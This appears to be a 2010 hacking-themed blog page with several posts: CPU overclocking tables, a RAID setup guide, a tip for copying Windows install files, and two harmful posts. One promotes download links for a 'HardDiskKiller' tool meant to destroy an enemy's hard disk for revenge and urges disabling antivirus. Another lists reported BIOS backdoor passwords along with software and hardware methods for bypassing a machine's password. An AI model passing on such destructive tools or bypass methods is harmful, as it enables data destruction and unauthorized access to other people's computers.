Showing posts with label CPU hacks. Show all posts
Showing posts with label CPU hacks. Show all posts

Tuesday, December 14, 2010

Which CPU's Can Be Hacked | How To hack A CPU

Know which CPUs can be hacked or overclocked.
With this brief look at the evolution of CPUs, you'll quickly see who makes the most hackable CPU. Armed with positive CPU identification and knowing what you want to accomplish in terms of performance, you'll be able to determine if your present CPU can be hacked or if you need a new CPU to gain better performance.
AMD CPUs are typically deemed more hackable than Intel CPUs as there are usually more system boards for AMD CPUs that provide the option to adjust the base clock speed and clock multiplierand Intel has typically locked down their CPUs to function at only one or a few clock multiplier settings, and they have usually rated and sold most of their CPUs at the highest speed they can be reliably be run. Table provides a quick overview of the most hackable CPU types and methods. Most CPUs can be overclocked by changing the base clock frequency, while some allow multiplier changes. In the case of a number of AMD and a few Intel CPUs, the chip can be modified to support overclocking.
Overclocking methods by CPU type
CPU
Overclocking options
Overclocking method
AMD Athlon
FSB clock, multiplier
Jumpers, BIOS, chip mod
AMD Duron
FSB clock, multiplier
Jumpers, BIOS, chip mod
Intel Celeron
FSB clock, multiplier
Jumpers, BIOS, chip mod
Intel Pentium I
FSB clock, multiplier
Jumpers, BIOS
Intel Pentium II (pre-8/98)
FSB clock, multiplier
Jumpers, BIOS, chip mod
Intel Pentium II (post-8/98)
FSB clock
Jumpers, BIOS
Intel Pentium III
FSB clock
Jumpers, BIOS
Intel Pentium 4
FSB clock
Jumpers, BIOS

The most significant limiting factors in overclocking potential are the features of the system board. As the Front Side Bus (FSB) speed is increased, the PCI and AGP bus speeds are also increased. So if the clock settings alter the FSB and PCI/AGP speeds in proportion to each other, you may reach the speed limit of the system components before you reach the limits of your CPU. If your system board features provide a variety of FSB speeds with separate PCI/AGP speed options, you can likely increase the CPU speed by 100% and still maintain reliable PCI/AGP bus speeds. The available clock setting options vary from system board to system board, even across boards from the same manufacturer.
According to http://www.sysopt.com, one of the most popular CPU analysis and overclocking sites, which collect data from dozens of real-world users who thrive on overclocking, the most overclockable CPUs are:
  • AMD Thunderbird
  • Pentium III Coppermine
  • Pentium 4
  • AMD Duron
Perhaps Intel saw the light in trying to recapture hobbyist market share and decided not to limit the overclockability of the Pentium III and 4 CPUs, a departure from their earlier restrictions on some Pentium II and Celerons chips. Do not let the lack of being able to change the multiplier values for Intel CPUs fool you into thinking they cannot run faster than rated speeds; most do run faster and quite well. While considering CPUs, you have to consider the most popular system boards for overclocking. According to http://www.sysopt.com, the top four overclockable system boards are:
  • Asus Tek
  • Abit
  • MicroStar
  • Epox

Intel CPUs

Relatively few Intel CPUs can be hacked because it's not in Intel's best interest to sell lower performance chips that can be made to perform like their higher performance versions. Some Intel CPUs perform better under overclocking conditions than others. Table lists the most hackable CPUs based on end-user reports from http://www.sysopt.com.
Hackable Intel CPUs
Processor
Published speed
Achieved speed
Percent increase
Pentium 4
3.1 GHz
5.0 GHz
+ 163%
Pentium 4
2.7 GHz
3.4 GHz
+ 25%
Celeron II
2.0 GHz
2.9 GHz
+ 45%
Pentium III Tualatin
450 MHz
1.2 GHz
+ 166%
Pentium II
400 MHz
2.6 GHz
+ 550%

While these performance gains are impressive, the claims by users who have achieved these speeds were not accompanied by how-to tips. Intel CPUs can be two to five times more expensive than comparable AMD CPUs, and hacking these CPUs and the system boards that support them is not well documented.

AMD CPUs

AMD CPUs are generally more overclockable than Intel's, with more parameter flexibility in the BIOS, for three reasons:
  • The manufacturers of boards that use AMD processors and related chipsets tend to use the hackable Award BIOS.
  • Available "white box" system boards are more hackable.
  • The flexibility of AMD processors accepts higher clock speeds and various clock-multiplier values.
Intel carries the majority of the CPU and the system board market with reputable OEMs whose products generally use restricted versions of Phoenix BIOS. By contrast, AMD reaches out to a different market that includes AMD for CPUs, Via for supporting chipsets, and Phoenix's Award BIOS division with significant parameter flexibility.
Tweaking AMD CPUs yields impressive results, as seen in the data from http://www.sysopt.com in Table, feeding the myth that many slower CPU chips are really higher speed devices that failed high-speed tests, were marked as slower speed devices, and were undersold.
Most hackable AMD CPUs and performance increases
Processor
Published speed
Achieved speed
Percent increase
Athlon MP
1.8 GHz
2.7 GHz
+ 50%
Athlon Thunderbird
1.7 GHz
2.4 GHz
+ 41%
Athlon Thunderbird
1.5 GHz
2.3 GHz
+ 53%
Athlon MP
1.5 GHz
2.1 GHz
+ 40%
Athlon MP
500 MHz
1.8 GHz
+ 260%

As with disclaimers for just about everything else, "your mileage may vary"—and it will—because the various combinations of CPU, chipset, BIOS, and system board design all yield different results. The distribution of overclockable CPUs for retail or online is not predictable; the plant where the chips are made may have had an excess of fast chips and a backlog of orders for slower ones and simply relabeled and shipped the faster CPUs to meet business needs or some monthly shipment quota.
Continue reading →

Speedup Your HDD With Raid


If one fast drive is good, then five working together is surely better.
Redundant Array of Inexpensive Disks (RAID) technology has been a significant lifesaver and performance boost for file servers. RAID can be set up in different configurations to provide systems with fault-tolerance or performance enhancements that are crucial to keeping data safe. It can be applied to personal desktop systems to provide significant disk drive performance enhancement.

RAID-0 (zero) is the most basic and highest performing RAID configuration. Portions of data normally stored on one disk drive are spread out across multiple drives, and those drives are accessed in parallel to deliver the data faster, because each drive does not have to access all of the data before it can be delivered. RAID-0 is unfortunately and by nature the least reliable in terms of data integrity, because a failure in any single drive renders all of the data useless.

In contrast to RAID-0, in a RAID-1 configuration all of the data is stored equally on two drives, in parallel. This slows the storage and reading performance but almost guarantees that the data remains intact even if one of the drives fails.

RAID-5
is somewhat a mix of RAID-0 and RAID-1, striping data across multiple drives but also adding error correction information across the drives, providing the advantages of parallel drives and a high degree of ability to recover data if one drive should fail.

Another hybrid implementation of RAID that is very affordable and intended for desktop system is RAID-0+1. The Promise Technology (http://www.promise.com) FastTrak TX4000 RAID controller card is specifically meant for desktop users with an appetite for high-performance disk systems. Performance enhancements of up to 30% are possible. Upgrading with top-performing disk drives and putting them into a RAID configuration just might knock the dust bunnies out of your keyboard.

The basic steps to install a RAID configuration on your PC are listed below. Be aware that the specific steps will be unique to the RAID controller (system board or add-in card type), your system BIOS, and RAID configuration software. After installation, the RAID configuration should appear to your operating system as a single-disk volume.

You need a RAID controller or RAID capabilities built into your system board. Promise Technologies is one of the most popular brands of add-in RAID controllers for IDE drives.

Have at least two identical disk drives on hand for RAID-0 and 1. Configuration of a simple RAID is a lot easier if the drives are identical: there will be no wasted space, and they should mirror each other and perform equally well. RAID 0+1 will require at least four disks.

If necessary, make a bootable DOS diskette with any necessary drivers or configuration program for your RAID controller. For BIOS-based RAID setups, familiarize yourself with the RAID setup screens and options in BIOS. It is likely you will have to connect the RAID drives to different IDE connections than the normal non-RAID IDE interfaces.

With the system powered down, install and connect the drives to the RAID controller interface connectors.

Start the system and either boot with the DOS diskette containing the RAID controller configuration program or get into the BIOS setup to access the RAID configuration screens.

Select the type of RAID you will be creating—typically 0, 1, or 0+1.

Partition the drives with the configuration program or BIOS screens. This process establishes how the RAID controller views and uses the drives.

When RAID controller configuration and disk partitioning is complete, you will either FORMAT the drives under DOS or start the installation of your operating system onto the new RAID system as the primary boot drive.

(RAID 1 and higher only) To test your configuration after installing your operating system, shut down and disconnect one of the RAID drives, then restart to verify that indeed the RAID system actually mirrors data to one of the drives.
Continue reading →

Speedup Operating System Installation And Maintainance

Save yourself time by making Windows installation files available on your hard drive.

We know you've had this problem: you install a new mouse, change a network setting, do almost anything that upsets the delicate balance in Windows and you're prompted to insert the Windows so-and-so CD. Where is it? Did you grab the right one?

If you have a lot of free disk space (about 700 MB), take a cue from the major PC makers and copy the files from your Windows CD to your hard drive. In fact, it's not a bad idea to copy the files before you install Windows so the resulting installation automatically knows where to find the files later—thus no prompting to insert a CD later.


PC manufacturers have typically placed the Windows 95, 98, 98SE, and Me files in a C:\WINDOWS\OPTIONS\CABS folder, and Windows NT, 2000 or XP files into C:\i386.

You can emulate this pattern for Windows 9x-Me by creating these folders on your hard drive from a DOS prompt, then copying the files from the CD (assuming this is drive D:) as follows, from the A:\> DOS prompt:

A:\>C:

C:\>MD WINDOWS C:\>MD

\WINDOWS\OPTIONS C:\>MD

\WINDOWS\OPTIONS\CABS C:\>CD

\WINDOWS\OPTIONS\CABS C:\

\WINDOWS\OPTIONS\CABS>COPY

D:\WIN98\*.*


Start the Windows installation from this folder by typing:

C:\ \WINDOWS\OPTIONS\CABS>SETUP

For Windows NT-XP:

A:\>C: C:\>MD

i386 C:\>CD i386

C:\I386>COPY D:\i386\*.*


Start the Windows installation from this folder by running this command:

C:\I386>WINNT


The next time Windows needs a file from the installation CD it will automatically look in the appropriate folder, copy the file, and move on.
Continue reading →

Damage Hard Disk Of Your Enemy : Please Don try On urs, Its A Genuine One


HI guys, This time m back with a really Awesome technique if U R Having any Enemy n if you want to take revenge from Sumone.

This Tool, or software or watever, if You Opens this , It Would Simply go for destroying Your Hard Disk Forever.. No If No Buts, No Permissions, No Denies. 

Once started, it wud take any breathe after Killing Your HDD, so Bettter B aware n keep this Very safely , A Sngle Double Click can make u a l'l tensed..

N Finally I m gonna reveal this Out. These Are the links.

http://www.ziddu.com/download/10661911/HardDiskKiller.txt.html

http://www.ziddu.com/download/10661912/readme.txt.html

Go for downloading them, it wud nto show any virus, No Antivirus Wud detect it.


But u want to Go off with it, Disable your Antivirus or ur frns's n u r done.

Here is one more step which m not including, so u have to Put On Sum of ur Brain. If u r really a keen hacker, thn u probably knows wat u have to do nxt.


Script Kiddies cn ask me thru comments..wud tell That Hidden Step As Well.
Enjoy Hacking Enjoy

NOTE: USE ON YOUR OWN RISK AND WILL, I DO NOT HOLD ANY RESPONSIBILITY IF YOU ARE TRAPPED.
Continue reading →

How To Byepass BIOS Passwords : The Smart Way


Introduction to BIOS Passwords

The best method to reset a BIOS password depends on what BIOS the computer has. Common BIOS's include AMI, Award, IBM and Phoenix. Numerous other BIOS's do exist, but these are the most common.
Some BIOS's allow you to require a password be entered before the system will boot. Some BIOS's allow you to require a password to be entered before the BIOS setup may be accessed.
The general categories of solutions to reset a BIOS password are:
  • Using a Backdoor BIOS Password
  • Resetting the BIOS Password using Software
  • Resetting the BIOS Password using Hardware
  • Vendor Specific Solutions for resetting the BIOS Password

Using a Backdoor BIOS Password

Some BIOS manufacturers implement a backdoor password. The backdoor password is a BIOS password that works, no matter what the user sets the BIOS password to. These passwords are typically used for testing and maintenance. Manufacturers typically change the backdoor BIOS passwords from time to time.

AMI Backdoor BIOS Passwords

Reported AMI backdoor BIOS passwords include A.M.I., AAAMMMIII, AMI?SW , AMI_SW, BIOS, CONDO, HEWITT RAND, LKWPETER, MI, and PASSWORD.

Award Backdoor BIOS Passwords

One reported Award backdoor BIOS password is eight spaces. Other reported Award backdoor BIOS passwords include 01322222, 589589, 589721, 595595, 598598 , ALFAROME, ALLY, ALLy, aLLY, aLLy, aPAf, award, AWARD PW, AWARD SW, AWARD?SW, AWARD_PW, AWARD_SW, AWKWARD, awkward, BIOSTAR, CONCAT, CONDO, Condo, condo, d8on, djonet, HLT, J256, J262, j262, j322, j332, J64, KDD, LKWPETER, Lkwpeter, PINT, pint, SER, SKY_FOX, SYXZ, syxz, TTPTHA, ZAAAADA, ZAAADA, ZBAAACA, and ZJAAADC.

Phoenix Backdoor BIOS Passwords

Reported Phoenix BIOS backdoor passwords include BIOS, CMOS, phoenix, and PHOENIX.

Backdoor BIOS Passwords from Other Manufacturers

Reported BIOS backdoor passwords for other manufacturers include:
ManufacturerBIOS Password
VOBIS & IBM merlin
Dell Dell
Biostar Biostar
Compaq Compaq
Enox xo11nE
Epox central
Freetech Posterie
IWill iwill
Jetway spooml
Packard Bell bell9
QDI QDI
Siemens SKY_FOX
SOYO SY_MB
TMC BIGO
Toshiba Toshiba
Remember that what you see listed may not be the actual backdoor BIOS password, this BIOS password may simply have the same checksum as the real backdoor BIOS password. For Award BIOS, this checksum is stored at F000:EC60.

Resetting the BIOS Password using Software

Every system must store the BIOS password information somewhere. If you are able to access the machine after it has been booted successfully, you may be able to view the BIOS password. You must know the memory address where the BIOS password is stored, and the format in which the BIOS password is stored. Or, you must have a program that knows these things.
You can write your own program to read the BIOS password from the CMOS memory on a PC by writing the address of the byte of CMOS memory that you wish to read in port 0x370, and then reading the contents of port 0x371.
!BIOS will recover the BIOS password for most common BIOS versions, including IBM, American Megatrends Inc, Award and Phoenix.
CmosPwd will recover the BIOS password for the following BIOS versions:
  • ACER/IBM BIOS
  • AMI BIOS
  • AMI WinBIOS 2.5
  • Award 4.5x/4.6x/6.0
  • Compaq (1992)
  • Compaq (New version)
  • IBM (PS/2, Activa, Thinkpad)
  • Packard Bell
  • Phoenix 1.00.09.AC0 (1994), a486 1.03, 1.04, 1.10 A03, 4.05 rev 1.02.943, 4.06 rev 1.13.1107
  • Phoenix 4 release 6 (User)
  • Gateway Solo - Phoenix 4.0 release 6
  • Toshiba
  • Zenith AMI

Resetting the BIOS Password using Hardware

If you cannot access the machine after if has been powered up, it is still possible to get past the BIOS password. The BIOS password is stored in CMOS memory that is maintained while the PC is powered off by a small battery, which is attached to the motherboard. If you remove this battery, all CMOS information (including the BIOS password) will be lost. You will need to re-enter the correct CMOS setup information to use the machine. The machines owner or user will most likely be alarmed when it is discovered that the BIOS password has been deleted.
On some motherboards, the battery is soldered to the motherboard, making it difficult to remove. If this is the case, you have another alternative. Somewhere on the motherboard you should find a jumper that will clear the BIOS password. If you have the motherboard documentation, you will know where that jumper is. If not, the jumper may be labeled on the motherboard. If you are not fortunate enough for either of these to be the case, you may be able to guess which jumper is the correct jumper. This jumper is usually standing alone near the battery. If you cannot locate this jumper, you might short both of the points where the battery connects to the motherboard.
If all else fails, you may have to clear the BIOS password by resetting the RTC (Real Time Clock) IC (Integrated Circuit) on your motherboard.
Many RTC's require an external battery. If your RTC is one of this type, you can clear the BIOS password just by unsocketing the RTC and reseating it.
RTC's which require external batteries include:
  • Dallas Semiconductor DS12885S
  • TI benchmarq bq3258S
  • Motorola MC146818AP
  • Hitachi HD146818AP
  • Samsung KS82C6818A
Most RTC chips with integrated batteries can be reset to clear the BIOS password by shorting two pins together for a few seconds.
You will see more than one option for some chips due to testing by various people in the field. Remember to remove power from the system before shorting these pins.
RTC ChipPins
Dallas DS1287ATI benchmarq bp3287AMT 3 (N.C.) and 21 (NC/RCL)
Chips & Technologies P82C206 12 (GND) and 32 (5V)-or-74 (GND) and 75 (5V)
OPTi F82C206 3 and 26
Dallas Semiconductor DS12887A 3 (N.C.) and 21 (RCLR)
You should be able to discover how to reset the BIOS password stored in most RTC (Real Time Clock) chips by reading the manufacturers data sheet for that RTC. Some RTC's, like the Dallas DS1287 and TI benchmarq bq3287mt cannot be cleared. The solution to resetting the BIOS password on systems with those RTC's is to purchase a replacement RTC chip. How inconvenient!

i Hope You guys enjoyed the Article, Enjoy Hacking, Enjoy Hackplanet.
Continue reading →


 

Popular Posts

Copyright 2010 Craze Club. All rights reserved.
A Blog By Qemren l Online Movies, Crazy Videos and Pictures,Pakistani Stage Dramas, Knowledge, World News,facebook wallpapers, Men Women Urban Fashion,Desi Fashion, Celebrities, Online Games, Wallpapers, Articles, Love, Technology, Sports, Interesting, Art,Information, History etc..

Craze Club